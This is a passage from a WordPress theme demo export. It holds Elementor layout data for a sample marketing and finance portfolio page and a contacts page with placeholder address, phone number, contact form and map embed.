										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3c1bcc97","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"269995a","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5abe166e","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1f4595df","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"3738a3a7","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"2a6a10f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"17d6ef46","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3ad8441","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4c261373","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"71428679","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1e56f55c","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"4a101bc2","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"344e5a57","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"31ba8a7c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"618b4571","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d286c1c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"772279c4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"683bd9c1","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"58ac0934","elType":"section","settings":[],"elements":[{"id":"5f0307b8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7fc027c8","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b1c6dce","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"703cb19c","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7c391983","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"36a23db2","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2b256455","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"314e22b3","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"15ab0039","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6f224ce5","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2de7223b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"1ed39b6d","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"d83ba2e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"589615f6","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"5476d97","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7e33be28","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5366e0d2","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"f0a696","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"12866002","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"51c3fad0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"58491f2a","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2c46a0c7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"545c307b","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"bc5596f","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1220]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[844]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_w]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz/contacts/</link>
		<pubDate>Fri, 04 Sep 2020 09:27:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=455</guid>
		<description></description>
		<content:encoded><![CDATA[contact details	        <h3>Our Contacts</h3>	    
		Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.		
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>	        
				<h6>Visit Us Daily</h6>				<p>411 University St, Seattle, USA</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>	        
				<h6><a href="tel:+1-800-456-478-23">Call Us 24/7</a></h6>				<p>+1-800-456-478-23</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>	        
				<h6><a href="mailto: maxbizz@mail.com">Mail Us</a></h6>				<p>maxbizz@mail.com</p>			
										<img width="849" height="878" src="https://maxbizz.s3.amazonaws.com/images/image-contacts.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image-contacts.png 849w, https://maxbizz.s3.amazonaws.com/images/image-contacts-290x300.png 290w, https://maxbizz.s3.amazonaws.com/images/image-contacts-768x794.png 768w" sizes="(max-width: 849px) 100vw, 849px" />											
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz/wp-admin/admin-ajax.php#wpcf7-f4-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="4" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f4-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<h4>Ready to Get Started?</h4>
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">Send Message</button>
</form>		
			<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>455</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:27:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:27:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contacts]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[457]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"86d48d0","elType":"section","settings":{"gap":"extended","structure":"21","padding":{"unit":"px","top":"116","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"1feabce","elType":"column","settings":{"_column_size":33,"_inline_size":43,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"030e332","elType":"widget","settings":{"sub":"contact details","title":"Our Contacts","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"header_size":"h3","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"588e854","elType":"widget","settings":{"editor":"Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"130afd7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title":"Visit Us Daily","header_size":"h6","des":"411 University St, Seattle, USA","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":27,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#FFF3E9","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"8ab1650","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title":"Call Us 